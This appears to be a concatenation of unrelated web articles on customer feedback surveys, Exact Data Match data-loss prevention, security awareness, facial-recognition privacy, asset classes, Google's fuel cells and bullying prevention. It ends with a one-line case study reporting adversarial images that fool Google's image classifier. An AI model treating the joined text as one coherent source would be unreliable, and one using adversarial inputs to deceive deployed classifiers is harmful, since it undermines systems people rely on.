We've already mentioned some common Voice of the Customer data collection techniques you can implement in your business. Once you've determined which techniques to leverage, the next step is to come up with a series of questions to ask customers to get a sense of how they think and feel. Here are some sample questions to help you get started:

- What gender do you identify as?
- What is your age?
- Where do you live?
- What is the highest degree or level of education you have completed?
- What is your current employment status?
- What is your marital status?
- What level of expertise do you have in [relevant subject area]?
- How do you prefer to learn (reading, listening, watching, etc.)?
- What is your preferred method of communication (email, phone, text/SMS, etc.)?
- What characteristics do you look for in a company/product?
- What are the biggest challenges you currently face?
- How can we help you overcome those challenges?
- What product/service do you wish someone would create?
- What comes to mind when you think about [company name/product name]?
- Which of our products or services do you currently use?
- Why did you choose our company/product over the competition?
- Are there any other companies whose product(s) you prefer over ours?
- If so, why?
- Can you provide an example of how you've benefited from using our product/service?
- On a scale of 1–5, with 1 being "Not at All Satisfied" and 5 being "Very Satisfied," how satisfied are you with our products/services?
- Would you recommend [company/product]?
- Why or why not?
- How can [company name] improve your customer experience?
- What can our company do to better serve your needs?
- What else would you like us to know?

How to Implement a Voice of the Customer Program

When developing and implementing a Voice of the Customer program, there are a few basic steps to follow.

What to Look for in a Voice of the Customer Solution

There are numerous VoC tools and solutions on the market today, each with its own set of advantages and disadvantages. Whether you're a small-to-medium-sized B2C company or an enterprise-level B2B business, we've compiled this list of questions to help you evaluate various solutions and find the VoC tool that's right for you:

- Does this solution store data in a centralized repository?
- Does this solution integrate with the technology our organization currently uses?
- Does this solution make it easy to share data with key stakeholders?
- Will this solution enable us to custom configure role-based dashboards?
- How difficult will it be to train our employees to use this solution?
- Will this solution enable our customers to provide feedback through whatever channel is most convenient for them?
- Does this solution combine structured and unstructured feedback in order to create a holistic view of the customer?
- Does this solution support interdepartmental collaboration?
- Does this solution incorporate employee feedback in order to provide valuable context to the customer experience?

Hitachi Solutions & Microsoft Dynamics 365 Customer Voice

Microsoft recently released Dynamics 365 Customer Voice, a real-time feedback management solution that, according to Microsoft General Manager Brenda Bown, is "designed to empower businesses and organizations to build better products [and] deliver better experiences to customers." Customer Voice includes an exciting array of features and capabilities, including:

- Premade, easy-to-personalize survey templates
- Custom-configured dashboards for real-time reporting
- Automated KPI monitoring for built-in satisfaction metrics
- Tight integration with the entire D365 application suite and Power Platform
- And more

If you're interested in discovering all that D365 Customer Voice has to offer, Hitachi Solutions is offering a one-day Customer Voice Enablement workshop. In this workshop, you'll learn how to leverage Customer Voice to generate real-time insights that enhance the customer experience. You can sign up for the workshop by following this link. If you have any other questions about Voice of the Customer, including how to get started creating and implementing a VoC strategy, Hitachi Solutions is here to help. Contact us today to find out what we can do for you.

Video: Become a Customer Service Self-Service Superhero!

Come learn about the evolving suite of Customer Service solutions available on the Power Platform and how these technologies can make you a superhero in the eyes of your customer.
https://play.vidyard.com/WGvV2eWZR8wLUkkorv5iBF.html
As the name suggests, Exact Data Match (EDM) compares two fields character by character across separate records. It is often referred to as deterministic linkage because it provides a definite outcome: whether or not the records match. An EDM tool can only be employed when your dataset contains uniquely identifiable attributes; a unique attribute is a data characteristic that cannot be the same for two entities.

What Is EDM in Cybersecurity?

Exact Data Match is a tool used during the data discovery phase. It helps uncover business information and specific sensitive data in both organised and unorganised data repositories. Simply put, EDM is a technique for data classification and matching. It identifies instances of data loss involving sensitive records stored in a structured format, and it employs data fingerprinting rather than pattern-matching techniques to protect sensitive data.

EDM in cybersecurity aims to identify and safeguard sensitive consumer information, such as MRNs, bank account numbers, and social security numbers, by examining the data itself rather than relying on pattern matching. This approach allows EDM to detect sensitive data accurately while minimising false positives, making it an efficient tool for discovering sensitive data.

How Does Exact Data Match Work?

EDM analyses large amounts of structured data organised in rows and columns. To use EDM, a Data Loss Prevention tool is installed on the customer's local server, which fingerprints these extensive data stores containing billions of cells.

A Data Loss Prevention (DLP) tool relies on the encrypted hash of the sensitive data you upload. The service indexes these encrypted hashes to create a dataset, and this indexed hash data is used in the DLP tool's security policy to match and prevent the transmission of sensitive data. Trained fingerprints are securely uploaded to the DLP using innovative fingerprinting techniques. This process allows Data Protection rules to be deployed quickly using these large fingerprint datasets to safeguard the most sensitive data in its original form. Referred to as Structured Fingerprints, these EDM fingerprints can be used as criteria to match content in data classifications, effectively preventing data exfiltration when the fingerprints are an exact match. With its precise matching capabilities, EDM not only relieves administrators from the manual effort of crafting complex regular expressions but also supports a high level of compliance adherence for enterprises.

Explaining the EDM Workflow

- Export user records from a database to a .csv or .tsv file. One can use the pipe command (|) to send user records from the database to the EDMTrain tool (a fingerprinting tool) for processing.
- Generate the EDM-enhanced fingerprint file and create an index. This step involves creating a unique fingerprint for each record in the user records file and generating an index so fingerprints can be searched and matched efficiently later.
- Define the criteria for content classification using the exact data-matching approach. This means specifying the data elements or patterns that must match exactly for content to be classified correctly.
- Create a rule set that incorporates the EDM (Enhanced) classification criteria. This rule set defines the actions to be taken when a match is found, and is applied to a Data Loss Prevention (DLP) policy that governs the protection and handling of sensitive data. A minimal sketch of this hash-index-match flow follows this list.
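To make the workflow concrete, here is a minimal Python sketch of the hash-index-match idea. It illustrates the concept only, not any vendor's actual EDM implementation: the file name, column names, and the `quarantine` helper in the usage comment are hypothetical, and production systems use salted or keyed fingerprints and far more robust tokenization than whitespace splitting.

```python
# Minimal sketch of the exact-data-match flow described above: fingerprint
# (hash) each sensitive cell from an exported CSV, build an index, then flag
# outbound content whose tokens hash to an indexed fingerprint.
import csv
import hashlib

def fingerprint(value: str) -> str:
    """Normalize a cell and return its SHA-256 hex digest."""
    return hashlib.sha256(value.strip().lower().encode("utf-8")).hexdigest()

def build_index(csv_path: str, columns: list[str]) -> set[str]:
    """Index fingerprints of the sensitive columns of an exported record file."""
    index: set[str] = set()
    with open(csv_path, newline="") as handle:
        for row in csv.DictReader(handle):
            for col in columns:
                if row.get(col):
                    index.add(fingerprint(row[col]))
    return index

def find_matches(outbound_text: str, index: set[str]) -> list[str]:
    """Return tokens in outbound content that exactly match an indexed cell."""
    return [tok for tok in outbound_text.split() if fingerprint(tok) in index]

# Hypothetical usage: block the message if any token matches a fingerprint.
# index = build_index("user_records.csv", ["ssn", "account_number"])
# if find_matches(email_body, index): quarantine(email_body)
```

The design point to notice is that only hashes of the sensitive cells are indexed, so the matching service never needs to hold the raw values.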
Why Is EDM Important?

Suppose a company wants to monitor its employees' use of social media during work hours to ensure productivity. It deploys a monitoring system that scans network traffic for any activity related to social media sites. This approach may generate numerous false positive alerts. For instance, if an employee uses a messaging platform like Facebook Messenger for work-related communication or accesses a professional networking platform like LinkedIn, the monitoring system might flag it as a violation and trigger an unnecessary alert. This can lead to frustration for both the employee and the security administrator who receives the alert.

The organisation can refine the monitoring process with Exact Data Matching (EDM). Instead of monitoring all social media activity, the system can focus on the specific platforms that are explicitly prohibited or pose a higher security risk. This way, only the designated platforms trigger alerts, while legitimate use of other platforms is not flagged. By reducing false positives, EDM allows admins to prioritise investigating genuine policy violations and potential security threats. It streamlines the system by minimising unnecessary alerts and allows resources to be allocated more efficiently towards genuine concerns.

Benefits of EDM

Inline Inspection and Enforcement

A Data Loss Prevention tool swiftly blocks data from leaving the organisation without negatively impacting user experience. EDM offers inline inspection for all network traffic, whether users are connected to the corporate network or not. This improves the accuracy of identifying data loss incidents and significantly reduces false positive alerts. EDM securely handles application and user traffic by adding native SSL inspection, boosting overall security and visibility.

Accurate and Detailed Data Classification

The DLP solution deploys advanced techniques, including predefined policies and machine learning algorithms, to precisely classify sensitive data. This level of granular data classification empowers organisations to apply appropriate security measures and effectively prevent unauthorised access to or leakage of sensitive information.

Compatible with Cloud Scalability

Users can fingerprint and match up to a billion data cells at any given time by leveraging the scalability of the cloud. Deploying an EDM solution on-premises may give rise to performance limitations due to the resource-intensive nature of the technology; the cloud provides the capacity and resources to handle large-scale data matching efficiently.

Limitations of EDM

Inability to Handle Variations

EDM relies on exact matches between data fields, which means it may struggle to handle variations in data entry. For example, if a name is misspelt or abbreviated differently in different datasets, EDM may fail to identify the match.

Sensitivity to Data Quality

EDM's effectiveness depends on the quality and consistency of the data being matched. Inaccurate or incomplete data can lead to false matches or missed matches; data cleaning and preprocessing are necessary to improve the accuracy of EDM results.

Lack of Contextual Understanding

EDM only considers exact matches without taking contextual information into account. It cannot comprehend the meaning or context behind the data, potentially leading to false positives or missed matches. For example, EDM may match two individuals with the same name and similar ages who are in fact different people.
Scalability

As datasets grow in size and complexity, EDM's scalability becomes a concern. Matching large volumes of data can be time-consuming and resource-intensive, especially when dealing with complex data structures or multiple data sources.

Lack of Flexibility in Matching Criteria

EDM operates on predefined matching criteria, such as exact matches on specific data fields. It may not adapt easily to different matching requirements or accommodate fuzzy-matching approaches.

Susceptibility to Data Privacy Risks

The use of EDM involves sharing sensitive data across different systems or organisations, which can introduce privacy risks if adequate security measures are not in place.

How Can InstaSafe Help?

As seen above, there is growing concern about the potential risks associated with data matching and privacy breaches. Care must be taken to ensure data protection, encryption, and compliance with relevant privacy regulations. The InstaSafe Zero Trust Application Access solution provides granular control and strict access restrictions for every user, eliminating unauthorised access to sensitive data. Our solution offers context-aware access controls, going beyond mere exact matches. Visit our website or contact us now to learn more and schedule a demo.

Frequently Asked Questions (FAQs)

What languages does EDM support?
EDM can support multiple languages, because it relies primarily on exact matches between data fields rather than language-specific processing. However, its effectiveness may vary based on the quality and consistency of data in different languages.

What is EDM classification?
EDM classification refers to categorising data based on specific criteria or attributes. In the context of Exact Data Match (EDM), it involves matching and classifying data based on exact matches of personally identifiable information (PII) across different datasets.

What are IDM and EDM in DLP?
IDM (Identity and Access Management) and EDM (Exact Data Match) are both components of Data Loss Prevention (DLP) systems. IDM focuses on managing user identities and controlling access to sensitive data, while EDM identifies and matches personally identifiable information (PII) across datasets to detect potential data breaches or unauthorised access.

Can you give an example of EDM?
An example of EDM is matching customer data from two databases to identify duplicate entries. If a company has two separate customer databases, EDM can compare customer names, addresses, and other relevant information to identify individuals who appear in both, helping to consolidate and de-duplicate customer records.
The Importance of Cybersecurity Awareness: Educating Users to Mitigate Risks

In today's digital age, where cyber threats continue to evolve in complexity and sophistication, cybersecurity awareness has become paramount. Organizations must recognize that their employees play a vital role in maintaining a secure environment. Educating users about cybersecurity risks, best practices, and the importance of vigilance is essential in mitigating potential threats. This article explores the significance of cybersecurity awareness and the key factors for success.

Understanding the Landscape

Cyberattacks pose significant risks, including data breaches, financial losses, and reputational damage. Hackers exploit vulnerabilities in systems and often target unsuspecting users through methods like phishing, social engineering, and malware attacks. By increasing cybersecurity awareness, organizations can minimize these risks and build a strong defense against potential threats.

The Role of Education

1. Recognizing Threats: Cybersecurity awareness educates users about various threats and their implications. Users gain an understanding of common attack vectors and are better equipped to identify suspicious emails, links, or requests, minimizing the chances of falling victim to malicious activities.

2. Practicing Good Cyber Hygiene: Educating users about good cybersecurity practices fosters a proactive security culture. This includes regularly updating software, using strong and unique passwords, implementing multi-factor authentication, and securely handling sensitive information. Such practices create a resilient and secure environment.

3. Raising Awareness of Social Engineering: Social engineering attacks rely on manipulating individuals into divulging sensitive information or taking malicious actions. Educating users about these tactics—such as phishing, pretexting, or baiting—helps them recognize warning signs and respond appropriately, mitigating potential risks.

4. Promoting Data Privacy: Cybersecurity awareness emphasizes the importance of protecting personal and sensitive data. Users learn about data privacy regulations, secure data handling practices, and the potential consequences of data breaches. This knowledge empowers individuals to take necessary precautions to safeguard personal and organizational information.

5. Encouraging Incident Reporting: Effective cybersecurity awareness programs encourage users to report any suspicious activities promptly. Establishing clear reporting channels and fostering a blame-free culture encourages users to come forward, enabling swift response and containment of potential security incidents.

Key Factors for Success

1. Leadership Support: Organizations must prioritize cybersecurity awareness and secure leadership support. When leaders champion cybersecurity initiatives and allocate resources for education and training, employees recognize the importance of cybersecurity and are more likely to embrace best practices.

2. Continuous Education: Cybersecurity awareness is an ongoing process. Regular training sessions, workshops, and communication campaigns ensure that users remain updated on emerging threats and evolving best practices. Reinforcing knowledge and providing real-life examples enhance the effectiveness of awareness programs.

3. User-Friendly Training: Effective cybersecurity awareness programs employ user-friendly training methods.
Interactive modules, simulations, and engaging content capture users' attention and promote better understanding and retention of cybersecurity concepts.

4. Tailored and Relevant Content: Customizing training content to address specific organizational risks and user roles increases its relevance. Users must understand how cybersecurity practices apply to their daily responsibilities, ensuring practical implementation and a sense of ownership.

5. Collaboration and Engagement: Engaging users through interactive exercises, gamification, and cybersecurity quizzes fosters a sense of ownership and collaboration. Encouraging dialogue, sharing success stories, and recognizing proactive behavior creates a positive cybersecurity culture.

Cybersecurity awareness is crucial for organizations seeking to mitigate risks and protect against evolving cyber threats. By educating users about potential risks, best practices, and the importance of vigilance, organizations can empower their employees to be active defenders against cyberattacks. Eccentrix's Cyberawareness for Users class offers comprehensive training, equipping individuals with the knowledge and skills to navigate the cyber landscape securely. By enrolling employees in this class, organizations can encourage them to enhance their cybersecurity awareness and contribute to a safer digital environment. With a well-informed and vigilant user base, organizations can fortify their defenses and minimize the impact of cyber threats.
Facial Biometrics Pose Privacy Woes

Lack of Consent Bothers Privacy Advocate Beth Givens

"Facial recognition technology can be used without the knowledge or the consent of the individual, to be totally oblivious," Beth Givens, founder and director of the Privacy Rights Clearinghouse, a privacy advocacy organization, says in an interview with GovInfoSecurity.com (transcript below). "Yet, once you identify that person based on the unique characteristics of their face, you could then match it with other databases."

Use of facial biometrics could affect a wide range of people. For example, Givens says, protesters could easily be identified at an assembly, shoppers could be targeted based on their shopping habits, and customers at banks could be given preferential treatment.

To make her point, Givens cites a study conducted by Carnegie Mellon University, in which researchers, using only a photo of a person's face and information made publicly available online, identified a person's birth date, personal interests and Social Security number. "Once you know a person's name, birth date, and social security number, you have enough information to commit new account fraud or identity theft," Givens says.

For information security officers in banking, government and healthcare, using biometrics as a possible tool to protect their critical data is fine if such applications are backed up with solid privacy and security policies and practices, Givens says.

In the interview, Givens explains that use of facial recognition technology could:
- Violate privacy rights by not getting an individual's consent.
- Result in unequal treatment of consumers by businesses.
- Encourage stalking and violence.

Givens founded the Privacy Rights Clearinghouse in 1992. She developed the clearinghouse's Fact Sheet series, which addresses a wide variety of privacy matters. Givens also authored the encyclopedia entries on identity theft for Encyclopedia of Privacy, World Book Encyclopedia and Encyclopedia of Crime and Punishment. She also authored The Privacy Rights Handbook: How to Take Control of Your Personal Information (Avon, 1997) and co-authored Privacy Piracy: A Guide to Protecting Yourself from Identity Theft (1999). She contributed a chapter on consumer and privacy rights to the 2006 book, RFID: Applications, Security and Privacy.

Privacy Rights Clearinghouse

ERIC CHABROW: Before we discuss your concerns with facial recognition technology, please take a few moments to tell us about the Privacy Rights Clearinghouse.

BETH GIVENS: We're not a new organization. We were founded nearly 20 years ago, before the Internet, actually, and before a lot of these emerging technologies came on the scene. We started as a California-only non-profit consumer education and consumer advocacy group. Since the advent of the Internet and when our website went online in 1996, we are now a nationwide group with a two-part mission. We do consumer education. We are kind of a "Dear Abby" of privacy in that we invite people to contact us with their questions and their complaints. We learn a lot just by talking directly with people. Then secondly, we are involved in some privacy advocacy in the California state legislature.

Facial Recognition Threats

CHABROW: The Privacy Rights Clearinghouse cautions that facial recognition technology, especially as it becomes more sophisticated, may be one of the greatest privacy threats of our time.
How so?

GIVENS: I have kind of a mantra in terms of privacy rights, and that is: individuals deserve transparency and they need control. Those two key words - transparency and control - say a lot. Facial recognition technology can be used without the knowledge or the consent of the individual, to be totally oblivious, totally invisible to the individual, and yet once you identify that person based on the unique characteristics of their face, you could then match it with other databases. You could connect online information to off-line information. There are a lot of possibilities in terms of where that simple capture of one's face will lead.

CHABROW: Can you give an example of that?

GIVENS: I'll give you two. One is sort of in the public arena and one is in the commercial arena. Let's just say that you are demonstrating at a public event. You may not like something that the government has done. You may be against a certain law, or a certain proposal, and you are out in public at an event. Those individuals who are participating in that event could have their faces captured, say by law enforcement or other government agencies, and then be identified in that way. That's kind of the constitutional side of the issue. I think most people, when they're out in public, take for granted that they're anonymous. I think they know that when they go into a commercial space, say a store, there are video cameras all over the place taking their photo, but now I'm moving over to the commercial sector application. You could actually be identified when you walk into a store, and if that store has a database on you — let's just say you're a frequent shopper, or maybe even this is the first time and the store is cooperating with an alliance of merchants — you could be identified. They might know then: are you an impulse shopper? What sorts of items are you likely to buy? What is your income level? You might be treated a certain way based on those things that they know about you. Or let's just say it's a bank. You walk in and they're able to immediately identify you as a top-notch, important, valued, moneyed customer, and you might get shuttled to the front of the line or to a special area for preferred customers. What if you are somebody coming in who just has a small account and a few transactions? You might not get served as well. Another commercial application that we are particularly concerned about is price discrimination. You might be offered one price, and this is particularly true in the online arena, if you have a certain profile, and another price if you have another. There are some, I think, tremendous privacy implications, both on the constitutional side of that privacy dividing line and the informational privacy side.

Facebook & Facial Recognition

CHABROW: In the press release you put out, you mentioned something about Facebook and combining that with other kinds of technologies, including facial recognition. Can you discuss your concerns with that?

GIVENS: Yes. In fact, let me refer to the Carnegie Mellon University study that really piqued our interest in this issue. They actually took Facebook photos. Now, they didn't use the Facebook facial recognition technology. All they did was go on Facebook and retrieve photos to then match against photos that they obtained from a different site, some online dating sites where people were not named.
They took these essentially anonymous photos from the dating site and were able to match them to publicly displayed photos on Facebook using an off-the-shelf facial recognition software program called PITT PATT (Pittsburgh Pattern Recognition). By the way, Google has since purchased PITT PATT, which I think is a significant matter. They were able to identify ten percent of all of those anonymous people from the dating site. In another test, I'm assuming on their Carnegie Mellon University campus, they took photos of students walking around on campus, and they were actually able to identify 31 percent of those. And then, I think even more fascinating, they took a photo of a person's face and all the information they could find publicly available online, and from that, and this is astounding, they figured out the person's birth date, their personal interests and their social security number. Now for me, since we've been involved in identity theft for a long time: once you know a person's name, birth date, and social security number, you have enough information to commit new account fraud or identity theft.

CHABROW: Are you aware of any laws that prohibit or limit the use of facial recognition technology, or are you aware of any bills before Congress or state legislatures that would restrict the use of facial recognition products?

GIVENS: Well, I know in Europe this is a big deal. In Germany, I know they're very, very concerned about this, and I think they've demanded that Google not use this technology. The European scene is quite different in terms of privacy laws than the U.S. scene, however. On the commercial side of the fence, I am not aware of a law specifically stating that facial recognition is prohibited or limited in any way. I don't think we're there yet. This is just to the best of my knowledge, however. I think with the attention that this issue is getting, there could very well be some bills, especially at the state level, perhaps even in Congress, that would address this issue. I know that Congress has addressed location-based identification services related to the mobile phone, for example, and that's an example of an emerging technology that also has significant privacy implications. It wouldn't surprise me, with the additional interest in this issue, if there would be some attention paid, either at the state level or in Congress.

Biometrics & Protecting Assets

CHABROW: Our audience largely consists of those in government, healthcare, financial services and other industries responsible for safeguarding their digital and physical assets. Biometrics, perhaps including facial recognition, could be one of the tools in their arsenal to do just that, such as facial scanning to identify those authorized to enter secured buildings or access a database containing sensitive data. Do you see that as a problem?

GIVENS: I think if they back up those applications with good, solid privacy and security policies and practices, then they will be in good shape. I think they should also pay attention to the whole emerging technology of biometric encryption. There is the biometric template. That's essentially the long string of zeros and ones that relates to the shape of your face and the key identification points on your face. And of course, all of this is then stored in a database, and other information about you is related to that long string of zeros and ones that identifies your face. It's a database, really, where all the action is.
Using biometric encryption, I think, would be a very important thing for people who read and listen to your messages to consider, and they might want to look at what the Province of Ontario's Privacy Commissioner has been doing in that regard. Ann Cavoukian has certainly been leading the way on this issue.

CHABROW: And do you know much about what is going on in Ontario?

GIVENS: They've been using it in the gaming and lottery industries, apparently for quite some time, because as you probably know, when you walk into a casino you're giving up all of your privacy. You're on camera and identified from the moment you enter to the moment you leave. I think if you want to examine a case history of surveillance, take a look at the casino industry. Up in Ontario, they've been working on encrypting all of that data compiled through digital surveillance and facial recognition biometrics in order to safeguard that data and prevent abusive uses of it.

CHABROW: Anything else you would like to add?

GIVENS: There's another key issue that I'm very concerned about. We're contacted from time to time by victims of stalking and domestic violence. I must say that one of my key concerns is the potential to use facial recognition technology and identification applications to actually identify individuals and then stalk them. I know that Google has been reluctant to put out a facial recognition app for mobile phones, and I would hope that other companies would think long and hard about this particular matter before they actually do that. If you see somebody on the street who catches your eye and you are somebody who may be obsessive or have a stalking mentality, imagine the harm that could be done with this technology. It's another concern that I want to toss out, because I think we're going to see this as a growing problem.
If you have ever wondered what an asset class is, or why understanding historical investment returns matters for your financial well-being, this is the right resource for you. This article covers the major types of asset classes, including stocks, bonds, real estate, commodities, and cash equivalents, examines the historical investment returns associated with each, and looks at the factors influencing those returns. By the end, you will have a better grasp of how to use historical investment returns to make well-informed decisions about your future investments.

What is an Asset Class?

An asset class is a grouping of investment vehicles that share similar characteristics and are governed by the same laws and regulations; asset classes play a crucial role in asset allocation and diversified investment strategies. Investors often distribute funds across various asset classes to manage risk and potentially maximize returns. Typical asset classes comprise equities (stocks), fixed income (bonds), real estate, commodities, and cash equivalents. Each asset class presents a distinct risk-return profile, allowing you to tailor your portfolio to your financial objectives and risk tolerance. Through diversification across multiple asset classes, you can mitigate the impact of market fluctuations on the overall performance of your portfolio.

Types of Asset Classes

The main types of asset classes include stocks, bonds, real estate, cash, and commodities, each offering distinct investment opportunities and risk profiles. Stocks, representing ownership in a company, have the potential for high returns but come with significant volatility. Bonds are debt instruments issued by governments or corporations, providing regular interest payments but with lower potential for growth. Real estate investments involve buying physical properties, which can generate rental income and appreciate in value over time. Cash, such as savings accounts or money market funds, offers liquidity and stability but usually yields lower returns. Commodities, like gold or oil, can be volatile due to supply and demand factors.

Why is Understanding Historical Investment Returns Important?

Understanding historical investment returns is crucial for informed financial planning and for crafting effective investment strategies, because it grants insight into how various asset classes have performed across different economic cycles. Analyzing historical data allows you to assess the potential risks and rewards associated with different investment opportunities. This information aids in setting realistic financial objectives and determining suitable asset allocations to attain those objectives. Historical investment returns can also act as a valuable benchmark for evaluating the performance of your current investment portfolio and making necessary adjustments. Integrating historical data into your investment decision-making can enhance overall portfolio management and improve the chances of achieving long-term financial goals.
Historical Investment Returns by Asset Class

Analyzing historical investment returns by asset class offers valuable insight into the performance, risk, and potential returns of different investments, enabling informed comparisons and more effective portfolio management.

Stocks

Stocks represent equity ownership in companies and have historically offered substantial capital growth, but they also come with higher volatility than other asset classes. Volatility in the stock market can cause significant fluctuations in the value of investments, so it is crucial to maintain a long-term perspective when including stocks in a portfolio. Despite the associated risks, stocks have demonstrated strong performance relative to other asset classes over the long term, presenting investors with the potential for significant capital growth. Many investors seeking growth opportunities turn to stocks in order to align with the success and profitability of leading companies across various sectors.

Bonds

Bonds, as fixed-income securities, have historically provided more stable returns than stocks, often acting as a buffer against market volatility. When investing in bonds, investors make loans to governments or corporations, with the borrower committing to pay interest over a specified period before repaying the principal. The attraction of bonds lies in their relative safety and dependable income stream. During periods of economic uncertainty, bonds are typically viewed as more secure investments than stocks due to their lower volatility. Bond prices tend to move in the opposite direction of interest rates: when interest rates decline, bond values tend to rise, potentially offering capital gains to investors.

Real Estate

Real estate investments can serve as a hedge against inflation and provide diversification, offering both income and potential capital appreciation. Across different economic cycles, real estate has demonstrated resilience by consistently generating income through rental returns, protecting investors from the erosive effect of inflation. The tangible nature of real estate assets makes them an attractive option for diversifying investment portfolios and reducing overall risk exposure. By combining income generation with the potential for price appreciation, real estate has solidified its position as a dependable long-term investment choice for individuals seeking stable returns amid market fluctuations.

Commodities

Commodities, such as natural resources like gold and oil, have historically exhibited significant market volatility while providing protection across various economic cycles. Raw materials serve as a hedge against inflation, as their worth typically rises when currency values fall. Historically, commodities have played a pivotal role in diversifying investment portfolios and mitigating overall risk. Investors often look to commodities to stabilize their investments, particularly in times of economic instability. Although commodity prices can fluctuate, they can help offset the effects of economic downturns when strategically integrated into a comprehensive investment plan.
Cash and Cash Equivalents

Cash and cash equivalents are highly liquid assets that deliver stability and immediate access to funds, though they typically yield lower returns than other asset classes. These short-term investments play a vital role in a diversified portfolio because they can be converted into cash quickly without significant loss of value. Investors appreciate the predictability and stability that cash and cash equivalents contribute to their overall financial position. Historically, cash and cash equivalents have retained their value during economic downturns, making them a dependable choice for capital preservation, and their liquidity makes them well suited to covering unforeseen short-term expenses.

Factors Affecting Historical Investment Returns

Various factors, including risk, diversification, market volatility, and economic cycles, shape historical investment returns and can significantly influence future performance. Understanding these dynamics is essential for investors navigating the complexities of financial markets. Market volatility can cause fluctuations in returns, while diversification strategies distribute risk across multiple asset classes to minimize potential losses. Economic cycles determine overall market health and influence investment returns in diverse ways. By analyzing these factors and adjusting investment strategies accordingly, investors can position themselves for more stable and potentially lucrative outcomes over the long term.

How to Use Historical Investment Returns for Future Investments

Leveraging historical investment returns can help steer your future investments: it clarifies potential risks and returns, supports setting achievable investment objectives, and informs a long-term strategy aligned with your financial planning goals. Analyzing past performance data yields insight into market trends and patterns that is instrumental in assessing future investment prospects. Understanding these patterns enables you to refine your investment approach, seizing potential opportunities while mitigating risks. Tailoring your portfolio to particular financial goals, whether short-term gains or long-term wealth preservation, can be achieved by considering various investment horizons. The short sketch following this article shows one simple way to summarize historical returns numerically.
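As an illustration of the kind of summary statistics discussed above, here is a minimal Python sketch that computes the compound annual growth rate (CAGR) and volatility of a return series. The return figures are made-up placeholders, not actual historical returns for any asset class.

```python
# Summarize a series of yearly fractional returns: CAGR and volatility.
# The sample data below is hypothetical, for illustration only.
import statistics

def cagr(yearly_returns: list[float]) -> float:
    """Geometric average annual growth rate of the series."""
    growth = 1.0
    for r in yearly_returns:
        growth *= (1.0 + r)
    return growth ** (1.0 / len(yearly_returns)) - 1.0

def volatility(yearly_returns: list[float]) -> float:
    """Sample standard deviation of yearly returns."""
    return statistics.stdev(yearly_returns)

hypothetical_returns = {
    "stocks": [0.12, -0.08, 0.21, 0.05, 0.15],
    "bonds":  [0.04, 0.03, -0.01, 0.05, 0.02],
}
for asset, rets in hypothetical_returns.items():
    print(f"{asset}: CAGR {cagr(rets):.2%}, volatility {volatility(rets):.2%}")
```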
Google Using Bloom Box, But Not in Data Center

Google (GOOG) was the first customer for Bloom Energy, and is using the startup's gas-powered fuel cells in its operations. But contrary to early media reports, it is not using any of the "Bloom Boxes" in its data centers at present.

February 22, 2010

Is Google using the "Bloom Box" units in one of its data centers? 60 Minutes reported Sunday that Google has been using four Bloom Boxes to power one of its data centers for the last 18 months. It turns out that's not quite correct.

"These fuel cells aren't powering any off-site data centers," said a Google spokesperson. "Instead, Bloom fuel cells are powering a portion of Google's energy needs at our headquarters right here in Mountain View. This is another on-site renewable energy source that we're exploring to help power our facilities. We have a 400kW installation on Google's main campus. Over the first 18 months the project has had 98% availability and delivered 3.8 million kWh of electricity."

The Bloom Energy units run on methane or other hydrocarbons. Each machine produces electricity, as well as some heat, carbon dioxide and water. While 400 kilowatts is a lot of power for some commercial buildings, it's a fraction of what would be needed for a major data center. The same goes for the 98 percent availability, as data centers typically shoot for at least "four nines" (99.99 percent uptime) and beyond; the short calculation at the end of this piece shows how large that gap is in practice.

Despite those issues, a number of data center projects have incorporated fuel cells using natural gas or biogas. Some previous examples:

- T-Systems is using a "hot module" fuel cell to provide power for a server room in a facility in Munich, Germany, which runs on biogas supplied by a plant in nearby Pliening.
- Fujitsu has used a fuel cell in its Sunnyvale data center. The fuel cell produces 200 kilowatts of power, which is enough to power half of the cooling needed in Fujitsu's data center.
- A Syracuse University data center is using gas-powered microturbines, which generate electricity, while the hot exhaust is piped to the chiller room, where it is used to generate cooling for the servers and both heat and cooling for an adjacent office building.
- Verizon has been using fuel cell technology to power one of its facilities in Garden City, N.Y., on Long Island. Seven fuel cells generate power for a 292,000-square-foot facility that provides telephone and data services to some 35,000 customers on Long Island.

The primary barrier to the use of fuel cells in data centers has been the up-front cost of the units. 60 Minutes reports that each Bloom unit costs $700,000 to $800,000. Venture capitalist John Doerr of Kleiner Perkins Caufield & Byers, one of Bloom Energy's backers, said the Bloom Box is intended to replace the grid for its customers. "It's cheaper than the grid, (and) it's cleaner than the grid," Doerr told 60 Minutes. We'll no doubt hear more in a Wednesday press conference to officially launch Bloom Energy.
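For a back-of-the-envelope sense of the availability gap mentioned above, this small Python sketch converts availability percentages into expected downtime per year; the figures are straightforward arithmetic, not measurements of any particular installation.

```python
# Expected downtime per year at a given availability level.
HOURS_PER_YEAR = 24 * 365

for label, availability in [
    ("Bloom installation (98%)", 0.98),
    ("Three nines (99.9%)", 0.999),
    ("Four nines (99.99%)", 0.9999),
]:
    downtime_hours = HOURS_PER_YEAR * (1 - availability)
    print(f"{label}: ~{downtime_hours:.1f} hours of downtime per year")
```

At 98 percent availability that works out to roughly 175 hours a year, versus under an hour at four nines, which is why figures that are respectable for campus power fall far short of data center requirements.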
Natasha Alam from True Blood has joined the growing list of celebrities speaking out publicly against bullying. Celebrities are raising awareness and bringing attention to this escalating challenge. Alam recently filmed an anti-bullying public service announcement (PSA).

Canada recently targeted bullying with its National Bullying Awareness Week, and the UK recently promoted the Big March to bring attention to bullying, violence, and harassment in schools. Each of these efforts encourages people to speak out about bullying and victimization, and adults are being urged to listen. These campaigns also mention prevention, the need for awareness, and how everyone (students, parents, teachers, staff, community members, and others) can play a role and make a difference.

I agree that PREVENTION is critical, and I agree we need to help victims be heard and encourage Security Teams and Prevention Teams to listen. Unfortunately, traditional 'safe school' approaches are not delivering the results we need. The statistics are real, the challenges victims face and the suicides are real, and it is clear that the time is now for new approaches.

The PSAs, marches, and awareness weeks are all great first steps. However, bullying is a systemic problem that needs comprehensive tools and solutions to deliver multi-directional awareness, accountability, auditability, and measurability.

How is your school measuring your efforts? Are administrators measuring incident reports and tips provided by victims and bystanders? Are you measuring whether school leaders and communities are listening? Are you measuring whether prevention and intervention efforts are working on an ongoing basis? Are you measuring whether your efforts meet the guidelines in the OCR Dear Colleague letter?

Awareity wants to know: How is your school addressing bullying? Do you have a new, innovative approach?
AI Case Study

Labsix researchers generate images and objects which deceive Google's image classifier successfully 96% and 84% of the time but remain undetectable to humans

